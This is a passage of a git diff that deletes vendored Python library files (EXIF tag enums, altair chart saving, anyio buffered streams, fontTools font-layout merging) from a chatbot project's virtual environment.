MaxApertureValue = 0x9205 - SubjectDistance = 0x9206 - MeteringMode = 0x9207 - LightSource = 0x9208 - Flash = 0x9209 - FocalLength = 0x920A - Noise = 0x920D - ImageNumber = 0x9211 - SecurityClassification = 0x9212 - ImageHistory = 0x9213 - TIFFEPStandardID = 0x9216 - MakerNote = 0x927C - UserComment = 0x9286 - SubsecTime = 0x9290 - SubsecTimeOriginal = 0x9291 - SubsecTimeDigitized = 0x9292 - AmbientTemperature = 0x9400 - Humidity = 0x9401 - Pressure = 0x9402 - WaterDepth = 0x9403 - Acceleration = 0x9404 - CameraElevationAngle = 0x9405 - XPTitle = 0x9C9B - XPComment = 0x9C9C - XPAuthor = 0x9C9D - XPKeywords = 0x9C9E - XPSubject = 0x9C9F - FlashPixVersion = 0xA000 - ColorSpace = 0xA001 - ExifImageWidth = 0xA002 - ExifImageHeight = 0xA003 - RelatedSoundFile = 0xA004 - ExifInteroperabilityOffset = 0xA005 - FlashEnergy = 0xA20B - SpatialFrequencyResponse = 0xA20C - FocalPlaneXResolution = 0xA20E - FocalPlaneYResolution = 0xA20F - FocalPlaneResolutionUnit = 0xA210 - SubjectLocation = 0xA214 - ExposureIndex = 0xA215 - SensingMethod = 0xA217 - FileSource = 0xA300 - SceneType = 0xA301 - CFAPattern = 0xA302 - CustomRendered = 0xA401 - ExposureMode = 0xA402 - WhiteBalance = 0xA403 - DigitalZoomRatio = 0xA404 - FocalLengthIn35mmFilm = 0xA405 - SceneCaptureType = 0xA406 - GainControl = 0xA407 - Contrast = 0xA408 - Saturation = 0xA409 - Sharpness = 0xA40A - DeviceSettingDescription = 0xA40B - SubjectDistanceRange = 0xA40C - ImageUniqueID = 0xA420 - CameraOwnerName = 0xA430 - BodySerialNumber = 0xA431 - LensSpecification = 0xA432 - LensMake = 0xA433 - LensModel = 0xA434 - LensSerialNumber = 0xA435 - CompositeImage = 0xA460 - CompositeImageCount = 0xA461 - CompositeImageExposureTimes = 0xA462 - Gamma = 0xA500 - PrintImageMatching = 0xC4A5 - DNGVersion = 0xC612 - DNGBackwardVersion = 0xC613 - UniqueCameraModel = 0xC614 - LocalizedCameraModel = 0xC615 - CFAPlaneColor = 0xC616 - CFALayout = 0xC617 - LinearizationTable = 0xC618 - BlackLevelRepeatDim = 0xC619 - BlackLevel = 0xC61A - BlackLevelDeltaH = 0xC61B - BlackLevelDeltaV = 0xC61C - WhiteLevel = 0xC61D - DefaultScale = 0xC61E - DefaultCropOrigin = 0xC61F - DefaultCropSize = 0xC620 - ColorMatrix1 = 0xC621 - ColorMatrix2 = 0xC622 - CameraCalibration1 = 0xC623 - CameraCalibration2 = 0xC624 - ReductionMatrix1 = 0xC625 - ReductionMatrix2 = 0xC626 - AnalogBalance = 0xC627 - AsShotNeutral = 0xC628 - AsShotWhiteXY = 0xC629 - BaselineExposure = 0xC62A - BaselineNoise = 0xC62B - BaselineSharpness = 0xC62C - BayerGreenSplit = 0xC62D - LinearResponseLimit = 0xC62E - CameraSerialNumber = 0xC62F - LensInfo = 0xC630 - ChromaBlurRadius = 0xC631 - AntiAliasStrength = 0xC632 - ShadowScale = 0xC633 - DNGPrivateData = 0xC634 - MakerNoteSafety = 0xC635 - CalibrationIlluminant1 = 0xC65A - CalibrationIlluminant2 = 0xC65B - BestQualityScale = 0xC65C - RawDataUniqueID = 0xC65D - OriginalRawFileName = 0xC68B - OriginalRawFileData = 0xC68C - ActiveArea = 0xC68D - MaskedAreas = 0xC68E - AsShotICCProfile = 0xC68F - AsShotPreProfileMatrix = 0xC690 - CurrentICCProfile = 0xC691 - CurrentPreProfileMatrix = 0xC692 - ColorimetricReference = 0xC6BF - CameraCalibrationSignature = 0xC6F3 - ProfileCalibrationSignature = 0xC6F4 - AsShotProfileName = 0xC6F6 - NoiseReductionApplied = 0xC6F7 - ProfileName = 0xC6F8 - ProfileHueSatMapDims = 0xC6F9 - ProfileHueSatMapData1 = 0xC6FA - ProfileHueSatMapData2 = 0xC6FB - ProfileToneCurve = 0xC6FC - ProfileEmbedPolicy = 0xC6FD - ProfileCopyright = 0xC6FE - ForwardMatrix1 = 0xC714 - ForwardMatrix2 = 0xC715 - PreviewApplicationName = 0xC716 - PreviewApplicationVersion = 0xC717 - PreviewSettingsName = 0xC718 - PreviewSettingsDigest = 0xC719 - PreviewColorSpace = 0xC71A - PreviewDateTime = 0xC71B - RawImageDigest = 0xC71C - OriginalRawFileDigest = 0xC71D - SubTileBlockSize = 0xC71E - RowInterleaveFactor = 0xC71F - ProfileLookTableDims = 0xC725 - ProfileLookTableData = 0xC726 - OpcodeList1 = 0xC740 - OpcodeList2 = 0xC741 - OpcodeList3 = 0xC74E - NoiseProfile = 0xC761 - - -"""Maps EXIF tags to tag names.""" -TAGS = { - **{i.value: i.name for i in Base}, - 0x920C: "SpatialFrequencyResponse", - 0x9214: "SubjectLocation", - 0x9215: "ExposureIndex", - 0x828E: "CFAPattern", - 0x920B: "FlashEnergy", - 0x9216: "TIFF/EPStandardID", -} - - -class GPS(IntEnum): - GPSVersionID = 0 - GPSLatitudeRef = 1 - GPSLatitude = 2 - GPSLongitudeRef = 3 - GPSLongitude = 4 - GPSAltitudeRef = 5 - GPSAltitude = 6 - GPSTimeStamp = 7 - GPSSatellites = 8 - GPSStatus = 9 - GPSMeasureMode = 10 - GPSDOP = 11 - GPSSpeedRef = 12 - GPSSpeed = 13 - GPSTrackRef = 14 - GPSTrack = 15 - GPSImgDirectionRef = 16 - GPSImgDirection = 17 - GPSMapDatum = 18 - GPSDestLatitudeRef = 19 - GPSDestLatitude = 20 - GPSDestLongitudeRef = 21 - GPSDestLongitude = 22 - GPSDestBearingRef = 23 - GPSDestBearing = 24 - GPSDestDistanceRef = 25 - GPSDestDistance = 26 - GPSProcessingMethod = 27 - GPSAreaInformation = 28 - GPSDateStamp = 29 - GPSDifferential = 30 - GPSHPositioningError = 31 - - -"""Maps EXIF GPS tags to tag names.""" -GPSTAGS = {i.value: i.name for i in GPS} - - -class Interop(IntEnum): - InteropIndex = 1 - InteropVersion = 2 - RelatedImageFileFormat = 4096 - RelatedImageWidth = 4097 - RleatedImageHeight = 4098 - - -class IFD(IntEnum): - Exif = 34665 - GPSInfo = 34853 - Makernote = 37500 - Interop = 40965 - IFD1 = -1 - - -class LightSource(IntEnum): - Unknown = 0 - Daylight = 1 - Fluorescent = 2 - Tungsten = 3 - Flash = 4 - Fine = 9 - Cloudy = 10 - Shade = 11 - DaylightFluorescent = 12 - DayWhiteFluorescent = 13 - CoolWhiteFluorescent = 14 - WhiteFluorescent = 15 - StandardLightA = 17 - StandardLightB = 18 - StandardLightC = 19 - D55 = 20 - D65 = 21 - D75 = 22 - D50 = 23 - ISO = 24 - Other = 255 diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py deleted file mode 100644 index 90d36f14bc5ebf5cb1e07cb469191ed21e4b3f4b..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/utils/save.py +++ /dev/null @@ -1,176 +0,0 @@ -import json -import pathlib -import warnings - -from .mimebundle import spec_to_mimebundle -from ..vegalite.v5.data import data_transformers - - -def write_file_or_filename(fp, content, mode="w", encoding=None): - """Write content to fp, whether fp is a string, a pathlib Path or a - file-like object""" - if isinstance(fp, str) or isinstance(fp, pathlib.PurePath): - with open(file=fp, mode=mode, encoding=encoding) as f: - f.write(content) - else: - fp.write(content) - - -def set_inspect_format_argument(format, fp, inline): - """Inspect the format argument in the save function""" - if format is None: - if isinstance(fp, str): - format = fp.split(".")[-1] - elif isinstance(fp, pathlib.PurePath): - format = fp.suffix.lstrip(".") - else: - raise ValueError( - "must specify file format: " - "['png', 'svg', 'pdf', 'html', 'json', 'vega']" - ) - - if format != "html" and inline: - warnings.warn("inline argument ignored for non HTML formats.", stacklevel=1) - - return format - - -def set_inspect_mode_argument(mode, embed_options, spec, vegalite_version): - """Inspect the mode argument in the save function""" - if mode is None: - if "mode" in embed_options: - mode = embed_options["mode"] - elif "$schema" in spec: - mode = spec["$schema"].split("/")[-2] - else: - mode = "vega-lite" - - if mode != "vega-lite": - raise ValueError("mode must be 'vega-lite', " "not '{}'".format(mode)) - - if mode == "vega-lite" and vegalite_version is None: - raise ValueError("must specify vega-lite version") - - return mode - - -def save( - chart, - fp, - vega_version, - vegaembed_version, - format=None, - mode=None, - vegalite_version=None, - embed_options=None, - json_kwds=None, - webdriver=None, - scale_factor=1, - engine=None, - inline=False, - **kwargs, -): - """Save a chart to file in a variety of formats - - Supported formats are [json, html, png, svg, pdf] - - Parameters - ---------- - chart : alt.Chart - the chart instance to save - fp : string filename, pathlib.Path or file-like object - file to which to write the chart. - format : string (optional) - the format to write: one of ['json', 'html', 'png', 'svg', 'pdf']. - If not specified, the format will be determined from the filename. - mode : string (optional) - Must be 'vega-lite'. If not specified, then infer the mode from - the '$schema' property of the spec, or the ``opt`` dictionary. - If it's not specified in either of those places, then use 'vega-lite'. - vega_version : string (optional) - For html output, the version of vega.js to use - vegalite_version : string (optional) - For html output, the version of vegalite.js to use - vegaembed_version : string (optional) - For html output, the version of vegaembed.js to use - embed_options : dict (optional) - The vegaEmbed options dictionary. Default is {} - (See https://github.com/vega/vega-embed for details) - json_kwds : dict (optional) - Additional keyword arguments are passed to the output method - associated with the specified format. - webdriver : string {'chrome' | 'firefox'} (optional) - Webdriver to use for png or svg output - scale_factor : float (optional) - scale_factor to use to change size/resolution of png or svg output - engine: string {'vl-convert', 'altair_saver'} - the conversion engine to use for 'png', 'svg', and 'pdf' formats - inline: bool (optional) - If False (default), the required JavaScript libraries are loaded - from a CDN location in the resulting html file. - If True, the required JavaScript libraries are inlined into the resulting - html file so that it will work without an internet connection. - The altair_viewer package is required if True. - **kwargs : - additional kwargs passed to spec_to_mimebundle. - """ - if json_kwds is None: - json_kwds = {} - - if embed_options is None: - embed_options = {} - - format = set_inspect_format_argument(format, fp, inline) - - # Temporarily turn off any data transformers so that all data is inlined - # when calling chart.to_dict. This is relevant for vl-convert which cannot access - # local json files which could be created by a json data transformer. Furthermore, - # we don't exit the with statement until this function completed due to the issue - # described at https://github.com/vega/vl-convert/issues/31 - with data_transformers.enable("default"), data_transformers.disable_max_rows(): - spec = chart.to_dict() - - mode = set_inspect_mode_argument(mode, embed_options, spec, vegalite_version) - - if format == "json": - json_spec = json.dumps(spec, **json_kwds) - write_file_or_filename(fp, json_spec, mode="w") - elif format == "html": - if inline: - kwargs["template"] = "inline" - mimebundle = spec_to_mimebundle( - spec=spec, - format=format, - mode=mode, - vega_version=vega_version, - vegalite_version=vegalite_version, - vegaembed_version=vegaembed_version, - embed_options=embed_options, - json_kwds=json_kwds, - **kwargs, - ) - write_file_or_filename(fp, mimebundle["text/html"], mode="w") - elif format in ["png", "svg", "pdf", "vega"]: - mimebundle = spec_to_mimebundle( - spec=spec, - format=format, - mode=mode, - vega_version=vega_version, - vegalite_version=vegalite_version, - vegaembed_version=vegaembed_version, - webdriver=webdriver, - scale_factor=scale_factor, - engine=engine, - **kwargs, - ) - if format == "png": - write_file_or_filename(fp, mimebundle["image/png"], mode="wb") - elif format == "pdf": - write_file_or_filename(fp, mimebundle["application/pdf"], mode="wb") - else: - encoding = kwargs.get("encoding", "utf-8") - write_file_or_filename( - fp, mimebundle["image/svg+xml"], mode="w", encoding=encoding - ) - else: - raise ValueError("Unsupported format: '{}'".format(format)) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py deleted file mode 100644 index 11474c16a988d0e1c50be2637b14438985bcfbc9..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/anyio/streams/buffered.py +++ /dev/null @@ -1,118 +0,0 @@ -from __future__ import annotations - -from dataclasses import dataclass, field -from typing import Any, Callable, Mapping - -from .. import ClosedResourceError, DelimiterNotFound, EndOfStream, IncompleteRead -from ..abc import AnyByteReceiveStream, ByteReceiveStream - - -@dataclass(eq=False) -class BufferedByteReceiveStream(ByteReceiveStream): - """ - Wraps any bytes-based receive stream and uses a buffer to provide sophisticated receiving - capabilities in the form of a byte stream. - """ - - receive_stream: AnyByteReceiveStream - _buffer: bytearray = field(init=False, default_factory=bytearray) - _closed: bool = field(init=False, default=False) - - async def aclose(self) -> None: - await self.receive_stream.aclose() - self._closed = True - - @property - def buffer(self) -> bytes: - """The bytes currently in the buffer.""" - return bytes(self._buffer) - - @property - def extra_attributes(self) -> Mapping[Any, Callable[[], Any]]: - return self.receive_stream.extra_attributes - - async def receive(self, max_bytes: int = 65536) -> bytes: - if self._closed: - raise ClosedResourceError - - if self._buffer: - chunk = bytes(self._buffer[:max_bytes]) - del self._buffer[:max_bytes] - return chunk - elif isinstance(self.receive_stream, ByteReceiveStream): - return await self.receive_stream.receive(max_bytes) - else: - # With a bytes-oriented object stream, we need to handle any surplus bytes we get from - # the receive() call - chunk = await self.receive_stream.receive() - if len(chunk) > max_bytes: - # Save the surplus bytes in the buffer - self._buffer.extend(chunk[max_bytes:]) - return chunk[:max_bytes] - else: - return chunk - - async def receive_exactly(self, nbytes: int) -> bytes: - """ - Read exactly the given amount of bytes from the stream. - - :param nbytes: the number of bytes to read - :return: the bytes read - :raises ~anyio.IncompleteRead: if the stream was closed before the requested - amount of bytes could be read from the stream - - """ - while True: - remaining = nbytes - len(self._buffer) - if remaining <= 0: - retval = self._buffer[:nbytes] - del self._buffer[:nbytes] - return bytes(retval) - - try: - if isinstance(self.receive_stream, ByteReceiveStream): - chunk = await self.receive_stream.receive(remaining) - else: - chunk = await self.receive_stream.receive() - except EndOfStream as exc: - raise IncompleteRead from exc - - self._buffer.extend(chunk) - - async def receive_until(self, delimiter: bytes, max_bytes: int) -> bytes: - """ - Read from the stream until the delimiter is found or max_bytes have been read. - - :param delimiter: the marker to look for in the stream - :param max_bytes: maximum number of bytes that will be read before raising - :exc:`~anyio.DelimiterNotFound` - :return: the bytes read (not including the delimiter) - :raises ~anyio.IncompleteRead: if the stream was closed before the delimiter - was found - :raises ~anyio.DelimiterNotFound: if the delimiter is not found within the - bytes read up to the maximum allowed - - """ - delimiter_size = len(delimiter) - offset = 0 - while True: - # Check if the delimiter can be found in the current buffer - index = self._buffer.find(delimiter, offset) - if index >= 0: - found = self._buffer[:index] - del self._buffer[: index + len(delimiter) :] - return bytes(found) - - # Check if the buffer is already at or over the limit - if len(self._buffer) >= max_bytes: - raise DelimiterNotFound(max_bytes) - - # Read more data into the buffer from the socket - try: - data = await self.receive_stream.receive() - except EndOfStream as exc: - raise IncompleteRead from exc - - # Move the offset forward and add the new data to the buffer - offset = max(len(self._buffer) - delimiter_size + 1, 0) - self._buffer.extend(data) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py deleted file mode 100644 index 7c74ad3c86e54cb7e9939ed2bf96aa59cc6dcd06..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/__main__.py +++ /dev/null @@ -1,35 +0,0 @@ -import sys - - -def main(args=None): - if args is None: - args = sys.argv[1:] - - # TODO Handle library-wide options. Eg.: - # --unicodedata - # --verbose / other logging stuff - - # TODO Allow a way to run arbitrary modules? Useful for setting - # library-wide options and calling another library. Eg.: - # - # $ fonttools --unicodedata=... fontmake ... - # - # This allows for a git-like command where thirdparty commands - # can be added. Should we just try importing the fonttools - # module first and try without if it fails? - - if len(sys.argv) < 2: - sys.argv.append("help") - if sys.argv[1] == "-h" or sys.argv[1] == "--help": - sys.argv[1] = "help" - mod = "fontTools." + sys.argv[1] - sys.argv[1] = sys.argv[0] + " " + sys.argv[1] - del sys.argv[0] - - import runpy - - runpy.run_module(mod, run_name="__main__") - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py deleted file mode 100644 index 6b85cd503387291f326e937b36a5739b1de23ef1..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/merge/layout.py +++ /dev/null @@ -1,530 +0,0 @@ -# Copyright 2013 Google, Inc. All Rights Reserved. -# -# Google Author(s): Behdad Esfahbod, Roozbeh Pournader - -from fontTools import ttLib -from fontTools.ttLib.tables.DefaultTable import DefaultTable -from fontTools.ttLib.tables import otTables -from fontTools.merge.base import add_method, mergeObjects -from fontTools.merge.util import * -import logging - - -log = logging.getLogger("fontTools.merge") - - -def mergeLookupLists(lst): - # TODO Do smarter merge. - return sumLists(lst) - - -def mergeFeatures(lst): - assert lst - self = otTables.Feature() - self.FeatureParams = None - self.LookupListIndex = mergeLookupLists( - [l.LookupListIndex for l in lst if l.LookupListIndex] - ) - self.LookupCount = len(self.LookupListIndex) - return self - - -def mergeFeatureLists(lst): - d = {} - for l in lst: - for f in l: - tag = f.FeatureTag - if tag not in d: - d[tag] = [] - d[tag].append(f.Feature) - ret = [] - for tag in sorted(d.keys()): - rec = otTables.FeatureRecord() - rec.FeatureTag = tag - rec.Feature = mergeFeatures(d[tag]) - ret.append(rec) - return ret - - -def mergeLangSyses(lst): - assert lst - - # TODO Support merging ReqFeatureIndex - assert all(l.ReqFeatureIndex == 0xFFFF for l in lst) - - self = otTables.LangSys() - self.LookupOrder = None - self.ReqFeatureIndex = 0xFFFF - self.FeatureIndex = mergeFeatureLists( - [l.FeatureIndex for l in lst if l.FeatureIndex] - ) - self.FeatureCount = len(self.FeatureIndex) - return self - - -def mergeScripts(lst): - assert lst - - if len(lst) == 1: - return lst[0] - langSyses = {} - for sr in lst: - for lsr in sr.LangSysRecord: - if lsr.LangSysTag not in langSyses: - langSyses[lsr.LangSysTag] = [] - langSyses[lsr.LangSysTag].append(lsr.LangSys) - lsrecords = [] - for tag, langSys_list in sorted(langSyses.items()): - lsr = otTables.LangSysRecord() - lsr.LangSys = mergeLangSyses(langSys_list) - lsr.LangSysTag = tag - lsrecords.append(lsr) - - self = otTables.Script() - self.LangSysRecord = lsrecords - self.LangSysCount = len(lsrecords) - dfltLangSyses = [s.DefaultLangSys for s in lst if s.DefaultLangSys] - if dfltLangSyses: - self.DefaultLangSys = mergeLangSyses(dfltLangSyses) - else: - self.DefaultLangSys = None - return self - - -def mergeScriptRecords(lst): - d = {} - for l in lst: - for s in l: - tag = s.ScriptTag - if tag not in d: - d[tag] = [] - d[tag].append(s.Script) - ret = [] - for tag in sorted(d.keys()): - rec = otTables.ScriptRecord() - rec.ScriptTag = tag - rec.Script = mergeScripts(d[tag]) - ret.append(rec) - return ret - - -otTables.ScriptList.mergeMap = { - "ScriptCount": lambda lst: None, # TODO - "ScriptRecord": mergeScriptRecords, -} -otTables.BaseScriptList.mergeMap = { - "BaseScriptCount": lambda lst: None, # TODO - # TODO: Merge duplicate entries - "BaseScriptRecord": lambda lst: sorted( - sumLists(lst), key=lambda s: s.BaseScriptTag - ), -} - -otTables.FeatureList.mergeMap = { - "FeatureCount": sum, - "FeatureRecord": lambda lst: sorted(sumLists(lst), key=lambda s: s.FeatureTag), -} - -otTables.LookupList.mergeMap = { - "LookupCount": sum, - "Lookup": sumLists, -} - -otTables.Coverage.mergeMap = { - "Format": min, - "glyphs": sumLists, -} - -otTables.ClassDef.mergeMap = { - "Format": min, - "classDefs": sumDicts, -} - -otTables.LigCaretList.mergeMap = { - "Coverage": mergeObjects, - "LigGlyphCount": sum, - "LigGlyph": sumLists, -} - -otTables.AttachList.mergeMap = { - "Coverage": mergeObjects, - "GlyphCount": sum, - "AttachPoint": sumLists, -} - -# XXX Renumber MarkFilterSets of lookups -otTables.MarkGlyphSetsDef.mergeMap = { - "MarkSetTableFormat": equal, - "MarkSetCount": sum, - "Coverage": sumLists, -} - -otTables.Axis.mergeMap = { - "*": mergeObjects, -} - -# XXX Fix BASE table merging -otTables.BaseTagList.mergeMap = { - "BaseTagCount": sum, - "BaselineTag": sumLists, -} - -otTables.GDEF.mergeMap = ( - otTables.GSUB.mergeMap -) = ( - otTables.GPOS.mergeMap -) = otTables.BASE.mergeMap = otTables.JSTF.mergeMap = otTables.MATH.mergeMap = { - "*": mergeObjects, - "Version": max, -} - -ttLib.getTableClass("GDEF").mergeMap = ttLib.getTableClass( - "GSUB" -).mergeMap = ttLib.getTableClass("GPOS").mergeMap = ttLib.getTableClass( - "BASE" -).mergeMap = ttLib.getTableClass( - "JSTF" -).mergeMap = ttLib.getTableClass( - "MATH" -).mergeMap = { - "tableTag": onlyExisting(equal), # XXX clean me up - "table": mergeObjects, -} - - -@add_method(ttLib.getTableClass("GSUB")) -def merge(self, m, tables): - assert len(tables) == len(m.duplicateGlyphsPerFont) - for i, (table, dups) in enumerate(zip(tables, m.duplicateGlyphsPerFont)): - if not dups: - continue - if table is None or table is NotImplemented: - log.warning( - "Have non-identical duplicates to resolve for '%s' but no GSUB. Are duplicates intended?: %s", - m.fonts[i]._merger__name, - dups, - ) - continue - - synthFeature = None - synthLookup = None - for script in table.table.ScriptList.ScriptRecord: - if script.ScriptTag == "DFLT": - continue # XXX - for langsys in [script.Script.DefaultLangSys] + [ - l.LangSys for l in script.Script.LangSysRecord - ]: - if langsys is None: - continue # XXX Create! - feature = [v for v in langsys.FeatureIndex if v.FeatureTag == "locl"] - assert len(feature) <= 1 - if feature: - feature = feature[0] - else: - if not synthFeature: - synthFeature = otTables.FeatureRecord() - synthFeature.FeatureTag = "locl" - f = synthFeature.Feature = otTables.Feature() - f.FeatureParams = None - f.LookupCount = 0 - f.LookupListIndex = [] - table.table.FeatureList.FeatureRecord.append(synthFeature) - table.table.FeatureList.FeatureCount += 1 - feature = synthFeature - langsys.FeatureIndex.append(feature) - langsys.FeatureIndex.sort(key=lambda v: v.FeatureTag) - - if not synthLookup: - subtable = otTables.SingleSubst() - subtable.mapping = dups - synthLookup = otTables.Lookup() - synthLookup.LookupFlag = 0 - synthLookup.LookupType = 1 - synthLookup.SubTableCount = 1 - synthLookup.SubTable = [subtable] - if table.table.LookupList is None: - # mtiLib uses None as default value for LookupList, - # while feaLib points to an empty array with count 0 - # TODO: make them do the same - table.table.LookupList = otTables.LookupList() - table.table.LookupList.Lookup = [] - table.table.LookupList.LookupCount = 0 - table.table.LookupList.Lookup.append(synthLookup) - table.table.LookupList.LookupCount += 1 - - if feature.Feature.LookupListIndex[:1] != [synthLookup]: - feature.Feature.LookupListIndex[:0] = [synthLookup] - feature.Feature.LookupCount += 1 - - DefaultTable.merge(self, m, tables) - return self - - -@add_method( - otTables.SingleSubst, - otTables.MultipleSubst, - otTables.AlternateSubst, - otTables.LigatureSubst, - otTables.ReverseChainSingleSubst, - otTables.SinglePos, - otTables.PairPos, - otTables.CursivePos, - otTables.MarkBasePos, - otTables.MarkLigPos, - otTables.MarkMarkPos, -) -def mapLookups(self, lookupMap): - pass - - -# Copied and trimmed down from subset.py -@add_method( - otTables.ContextSubst, - otTables.ChainContextSubst, - otTables.ContextPos, - otTables.ChainContextPos, -) -def __merge_classify_context(self): - class ContextHelper(object): - def __init__(self, klass, Format): - if klass.__name__.endswith("Subst"): - Typ = "Sub" - Type = "Subst" - else: - Typ = "Pos" - Type = "Pos" - if klass.__name__.startswith("Chain"): - Chain = "Chain" - else: - Chain = "" - ChainTyp = Chain + Typ - - self.Typ = Typ - self.Type = Type - self.Chain = Chain - self.ChainTyp = ChainTyp - - self.LookupRecord = Type + "LookupRecord" - - if Format == 1: - self.Rule = ChainTyp + "Rule" - self.RuleSet = ChainTyp + "RuleSet" - elif Format == 2: - self.Rule = ChainTyp + "ClassRule" - self.RuleSet = ChainTyp + "ClassSet" - - if self.Format not in [1, 2, 3]: - return None # Don't shoot the messenger; let it go - if not hasattr(self.__class__, "_merge__ContextHelpers"): - self.__class__._merge__ContextHelpers = {} - if self.Format not in self.__class__._merge__ContextHelpers: - helper = ContextHelper(self.__class__, self.Format) - self.__class__._merge__ContextHelpers[self.Format] = helper - return self.__class__._merge__ContextHelpers[self.Format] - - -@add_method( - otTables.ContextSubst, - otTables.ChainContextSubst, - otTables.ContextPos, - otTables.ChainContextPos, -) -def mapLookups(self, lookupMap): - c = self.__merge_classify_context() - - if self.Format in [1, 2]: - for rs in getattr(self, c.RuleSet): - if not rs: - continue - for r in getattr(rs, c.Rule): - if not r: - continue - for ll in getattr(r, c.LookupRecord): - if not ll: - continue - ll.LookupListIndex = lookupMap[ll.LookupListIndex] - elif self.Format == 3: - for ll in getattr(self, c.LookupRecord): - if not ll: - continue - ll.LookupListIndex = lookupMap[ll.LookupListIndex] - else: - assert 0, "unknown format: %s" % self.Format - - -@add_method(otTables.ExtensionSubst, otTables.ExtensionPos) -def mapLookups(self, lookupMap): - if self.Format == 1: - self.ExtSubTable.mapLookups(lookupMap) - else: - assert 0, "unknown format: %s" % self.Format - - -@add_method(otTables.Lookup) -def mapLookups(self, lookupMap): - for st in self.SubTable: - if not st: - continue - st.mapLookups(lookupMap) - - -@add_method(otTables.LookupList) -def mapLookups(self, lookupMap): - for l in self.Lookup: - if not l: - continue - l.mapLookups(lookupMap) - - -@add_method(otTables.Lookup) -def mapMarkFilteringSets(self, markFilteringSetMap): - if self.LookupFlag & 0x0010: - self.MarkFilteringSet = markFilteringSetMap[self.MarkFilteringSet] - - -@add_method(otTables.LookupList) -def mapMarkFilteringSets(self, markFilteringSetMap): - for l in self.Lookup: - if not l: - continue - l.mapMarkFilteringSets(markFilteringSetMap) - - -@add_method(otTables.Feature) -def mapLookups(self, lookupMap): - self.LookupListIndex = [lookupMap[i] for i in self.LookupListIndex] - - -@add_method(otTables.FeatureList) -def mapLookups(self, lookupMap): - for f in self.FeatureRecord: - if not f or not f.Feature: - continue - f.Feature.mapLookups(lookupMap) - - -@add_method(otTables.DefaultLangSys, otTables.LangSys) -def mapFeatures(self, featureMap): - self.FeatureIndex = [featureMap[i] for i in self.FeatureIndex] - if self.ReqFeatureIndex != 65535: - self.ReqFeatureIndex = featureMap[self.ReqFeatureIndex] - - -@add_method(otTables.Script) -def mapFeatures(self, featureMap): - if self.DefaultLangSys: - self.DefaultLangSys.mapFeatures(featureMap) - for l in self.LangSysRecord: - if not l or not l.LangSys: - continue - l.LangSys.mapFeatures(featureMap) - - -@add_method(otTables.ScriptList) -def mapFeatures(self, featureMap): - for s in self.ScriptRecord: - if not s or not s.Script: - continue - s.Script.mapFeatures(featureMap) - - -def layoutPreMerge(font): - # Map indices to references - - GDEF = font.get("GDEF") - GSUB = font.get("GSUB") - GPOS = font.get("GPOS") - - for t in [GSUB, GPOS]: - if not t: - continue - - if t.table.LookupList: - lookupMap = {i: v for i, v in enumerate(t.table.LookupList.Lookup)} - t.table.LookupList.mapLookups(lookupMap) - t.table.FeatureList.mapLookups(lookupMap) - - if ( - GDEF - and GDEF.table.Version >= 0x00010002 - and GDEF.table.MarkGlyphSetsDef - ): - markFilteringSetMap = { - i: v for i, v in enumerate(GDEF.table.MarkGlyphSetsDef.Coverage) - } - t.table.LookupList.mapMarkFilteringSets(markFilteringSetMap) - - if t.table.FeatureList and t.table.ScriptList: - featureMap = {i: v for i, v in enumerate(t.table.FeatureList.FeatureRecord)} - t.table.ScriptList.mapFeatures(featureMap) - - # TODO FeatureParams nameIDs - - -def layoutPostMerge(font): - # Map references back to indices - - GDEF = font.get("GDEF") - GSUB = font.get("GSUB") - GPOS = font.get("GPOS") - - for t in [GSUB, GPOS]: - if not t: - continue - - if t.table.FeatureList and t.table.ScriptList: - # Collect unregistered (new) features. - featureMap = GregariousIdentityDict(t.table.FeatureList.FeatureRecord) - t.table.ScriptList.mapFeatures(featureMap) - - # Record used features. - featureMap = AttendanceRecordingIdentityDict( - t.table.FeatureList.FeatureRecord - ) - t.table.ScriptList.mapFeatures(featureMap) - usedIndices = featureMap.s - - # Remove unused features - t.table.FeatureList.FeatureRecord = [ - f - for i, f in enumerate(t.table.FeatureList.FeatureRecord) - if i in usedIndices - ] - - # Map back to indices. - featureMap = NonhashableDict(t.table.FeatureList.FeatureRecord) - t.table.ScriptList.mapFeatures(featureMap) - - t.table.FeatureList.FeatureCount = len(t.table.FeatureList.FeatureRecord) - - if t.table.LookupList: - # Collect unregistered (new) lookups. - lookupMap = GregariousIdentityDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - - # Record used lookups. - lookupMap = AttendanceRecordingIdentityDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - usedIndices = lookupMap.s - - # Remove unused lookups - t.table.LookupList.Lookup = [ - l for i, l in enumerate(t.table.LookupList.Lookup) if i in usedIndices - ] - - # Map back to indices. - lookupMap = NonhashableDict(t.table.LookupList.Lookup) - t.table.FeatureList.mapLookups(lookupMap) - t.table.LookupList.mapLookups(lookupMap) - - t.table.LookupList.LookupCount = len(t.table.LookupList.Lookup) - - if GDEF and GDEF.table.Version >= 0x00010002: - markFilteringSetMap = NonhashableDict( - GDEF.table.MarkGlyphSetsDef.Coverage - ) - t.table.LookupList.mapMarkFilteringSets(markFilteringSetMap) - - # TODO FeatureParams nameIDs diff --git 